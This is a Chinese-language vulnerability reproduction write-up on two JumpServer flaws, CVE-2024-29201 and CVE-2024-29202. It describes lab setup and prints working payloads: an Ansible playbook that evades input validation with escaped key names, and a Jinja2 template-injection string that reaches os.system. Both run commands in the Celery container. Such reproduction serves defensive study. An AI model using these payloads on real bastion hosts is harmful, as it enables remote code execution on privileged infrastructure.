CVE-2024-29201&29202：JumpServer后台RCE漏洞

关注我们❤️，添加星标🌟，一起学安全！
作者：七安@Timeline Sec
本文字数：1180
阅读时长：2～4min
声明：仅供学习参考使用，请勿用作违法用途，否则后果自负

0x01 简介

JumpServer 是广受欢迎的开源堡垒机，是符合 4A 规范的专业运维安全审计系统。

0x02 漏洞概述

漏洞编号：CVE-2024-29201&CVE-2024-29202

CVE-2024-29201 远程代码执行漏洞，该漏洞可绕过 JumpServer 的 Ansible 中的输入验证机制，在 Celery 容器中执行任意代码 

CVE-2024-29202 Jinin2 模板注入漏洞，该漏洞是有 JumpServer 的 Ansible 中存在 Jinja2 模板注入，在 Celery 容器中执行任意代码。

值得注意的是：两个漏洞利用的条件都需要账号。

0x03 影响版本

v3.0.0 <= JumpServer <= v3.10.6

0x04 环境搭建

首先下载官方提供的脚本，下载后编辑 quick_start.sh，将脚本中的 VERSION 修改为存在漏洞版本，如：V3.10.6。如下图所示：

等待服务启动，启动完成后访问 http://ip/

JumpServer 默认账号密码为 admin/admin

接着进入后台添加资产，具体步骤如下图所示：

添加资产后需要测试是否添加成功，点击资产后面的 更多-测试 进行测试。

资产添加完成后添加用户，如下图所示：

最后为用户分配一个资产，如下图所示：

至此环境搭建完成。

0x05 漏洞复现

CVE-2024-29201

登陆创建的普通用户账号，进入 作业中心-模板管理 添加一个 Playbook

点击创建的 Playbook 名称，切换到 工作空间，输入以下内容：

[{
     "name": "RCE playbook",
     "hosts": "all",
     "tasks": [
       {
         "name": "this runs in Celery container",
         "shell": "id > /tmp/pwnd",
         "u0064elegate_to": "localhost"
} ],
     "vars": {
     "ansible_u0063onnection": "local"
     }
}]

点击保存。保存完成之后切换到 作业管理 页面，创建一个新的 Playbook 作业

playbook 作业详情如下：

点击保存并运行作业

运行结果如下：

进入 Celery 容器，查看 tmp 目录下是否存在 pwnd 文件

CVE-2024-29202

与 CVE-2024-29201类似，进入 作业中心-模板管理 添加一个 Playbook，在 工作空间 输入的内容为：

- name: |
       {% for x in ().__class__.__base__.__subclasses__() %}
         {% if "warning" in x.__name__ %}
           {{
             x()._module.__builtins__["__import__"]("os").system("id > /tmp/pwnd2")
           }}
         {%endif%}
       {%endfor%}

添加完成后，同样进入作业管理页面创建并运行 Playbook 作业。运行结果如下：

进入 Celery 容器，查看 tmp 目录下是否存在 pwnd2 文件

0x06 修复方式

参考链接

https://github.com/jumpserver/jumpserver/security/advisories/GHSA-pjpp-cm9x-6rwj

https://github.com/jumpserver/jumpserver/security/advisories/GHSA-2vvr-vmvx-73ch

https://github.com/jumpserver/jumpserver/securit

历史漏洞

CVE-2023-42820-前台-POC已公开
CVE-2023-43650-前台-POC已公开
CVE-2023-42442-前台-POC已公开
CVE-2024-29202-POC已公开
CVE-2023-42819-POC已公开
CVE-2023-43652-POC已公开
CVE-2023-43651-POC已公开